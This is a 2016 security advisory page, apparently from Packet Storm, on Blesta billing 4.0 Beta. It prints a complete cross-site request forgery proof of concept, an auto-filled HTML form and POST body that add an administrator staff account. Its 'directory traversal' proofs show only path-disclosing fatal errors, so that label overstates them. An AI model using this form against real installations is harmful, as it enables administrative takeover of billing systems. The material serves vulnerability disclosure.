what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Biesta Billing 4.0 Beta Cross Site Request Forgery / Traversal

Biesta Billing 4.0 Beta Cross Site Request Forgery / Traversal
Posted Nov 29, 2016
Authored by Taurus Omar

Biesta Billing version 4.0 Beta suffers from cross site request forgery and directory traversal vulnerabilities.

tags | exploit, vulnerability, file inclusion, csrf
SHA-256 | 1dbc8d21c6556545a544de74ed9e813e4cb5d2098b52219b9c607c83be2a4e40

Biesta Billing 4.0 Beta Cross Site Request Forgery / Traversal

Change Mirror Download
  ____        _           _____           
| _ \ | | / ____|
| |_) |_ _| |__ ___| (___ ___ ___
| _ <| | | | '_ \ / _ \\___ \ / _ \/ __|
| |_) | |_| | | | | (_) |___) | __/ (__
|____/ \__,_|_| |_|\___/_____/ \___|\___|


Document Title:
===============
Blesta Billing 4.0 Beta Multiple Vulnerabilities

Credits & Authors:
==================
TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com]


Product & Service Introduction:
===============================
Blesta is a software product of Phillips Data, Inc., founded in Y2K. First released in 2007, is e-commerce web application and billing. Blesta was rewritten and version 3.0 was released to much anticipation on Aug 14, 2013.
Due to innovation, well-written code, and the support of thousands of customers worldwide, Blesta continues to be a leader in the hosting billing software space.

Abstract Advisory Information:
==============================
An independent researcher discovered Multiple Vulnerabilities in the official aplication Blesta 4.0 Beta

Vulnerability Disclosure Timeline:
==================================
2016-28-11: Public Disclosure

Discovery Status:
=================
Published


Affected Product(s):
====================
Phillips Data, Inc
Product: Blesta 4.0 Blesta
https://www.blesta.com/


Severity Level:
===============
High


Technical Details & Description:
================================
A client-side cross site request forgery vulnerability has been discovered in the official Blesta billing web-application.
The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism.
The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.
Exploitation of the vulnerability dont requires web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized add or add of Blesta connect service panel staff.The web vulnerability can be exploited by any attackers.

Proof of Concept CSRF (PoC):
============================
<html>
<div class="content_section"><div class="common_box_content"> <div class="inner">
<form id="staff" action="http://sitio.com/facturacin/admin/settings/system/staff/add/" method="post">
<input type="hidden" value="3c1806600ab6d12c5b1496586f7f0c8ab59bd5cb67b2e35c2578ead5382790e2" name="_csrf_token">
<div class="title_row first">
<h3>Contact Info</h3>
</div>
<div class="pad">
<ul>
<li>
<label for="first_name">First Name</label>
<input type="text" id="first_name" value="primernombre" name="first_name">
</li>
<li>
<label for="last_name">Last Name</label>
<input type="text" id="last_name" value="segundonombre" name="last_name">
</li>
<li>
<label for="email">E-mail</label>
<input type="text" id="email" value="micorreo@buhosec.com" name="email">
</li>
</ul>
</div>
<div class="title_row">
<h3>Authentication</h3>
</div>
<div class="pad">
<ul>
<li>
<label for="user_email">Username</label>
<input type="radio" checked="checked" id="user_email" value="email" name="username_type">
<label class="inline" for="user_email">Use the email address as the username</label>
<input type="radio" id="username_type" value="user" name="username_type" checked="checked">
<label class="inline" for="username">Enter a username</label>
<input type="text" id="username" value="usuariologin" name="username">
</li>
<li>
<label for="new_password">Password</label>
<input type="password" id="last_name" value="tupassword123" name="new_password">
</li>
<li>
<label for="confirm_password">Confirm Password</label>
<input type="password" id="confirm_password" value="tupassword123" name="confirm_password">
</li>
<div class="title_row">
<h3>Groups</h3>
</div>
<div class="pad">
<table>
<tbody><tr>
<td>Member Groups</td>
<td></td>
<td>Available Groups</td>
</tr>
<tr>
<td>
<select multiple="multiple" class="groups" id="assigned" name="groups[1]">
<option value="1">Administrators - Mi facturaciA3n</option></select>
</td>
<td><a class="move_left" href="#">&nbsp;</a> &nbsp; <a class="move_right" href="#">&nbsp;</a></td>
<td>
<select multiple="multiple" class="groups" id="available" name="available[]">
<option value="2">Billing - Mi facturaciA3n</option>
</select>
</td>
</tr>
</tbody></table>
</div>
<div class="button_row"><a href="http://sitio.com/facturacin/admin/settings/system/staff/add/#" class="btn_right submit">Create Staff</a></div>
</form>
</div>
</div>
</div>
</html>

Send Post (PoC):
================
_csrf_token=3c1806600ab6d12c5b1496586f7f0c8ab59bd5cb67b2e35c2578ead5382790e2&first_name=primernombre&last_name=segundonombre&email=micorreo%40buhosec.com&username_type=user&username=usuariologin&new_password=tupassword123&confirm_password=tupassword123&two_factor_mode=none&two_factor_key=af61733cb012a19f62edb5a7c913ca0eea70c38d&two_factor_pin=&groups%5B%5D=1

Proof of Concept Directory Traversal 1 Path /form > form.php (PoC):
===================================================================
http://sitio.com/facturacin/helpers/form/form.php
Fatal error: Class 'Loader' not found in /home/usuariohost/public_html/sitio.com/facturacin/helpers/form/form.php on line 2

Proof of Concept Directory Traversal 2 Path Config > i18.php (PoC):
===================================================================
http://sitio.com/facturacin/config/i18.php
Fatal error: Class 'Configure' not found in /home/usuariohost/public_html/sitio.com/facturacin/config/i18.php on line 2

Proof of Concept Directory Traversal 3 Path vendors > h2o > ext > adminmedia.php (PoC):
=======================================================================================
http://sitio.com/facturacin/vendors/h2o/ext/adminmedia.php
Fatal error: Class 'H2o_Node' not found in /home/usuariohost/public_html/sitio.com/facturacin/vendors/h2o/ext/adminmedia.php on line 3


Proof of Concept CSRF Vulnerability (IMAGES):
=============================================
1. http://i.imgur.com/kkIAnvJ.png
2. http://i.imgur.com/zOY1ia3.png

Proof of Concept Directory Traversal (IMAGES):
=============================================
1. http://i.imgur.com/jKjXzWb.png
2. http://i.imgur.com/zqOoL3I.png
3. http://i.imgur.com/Iuf2Oz6.png

#Taurusomar_ #Taurusomar #Buhosec #InfoSec


Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close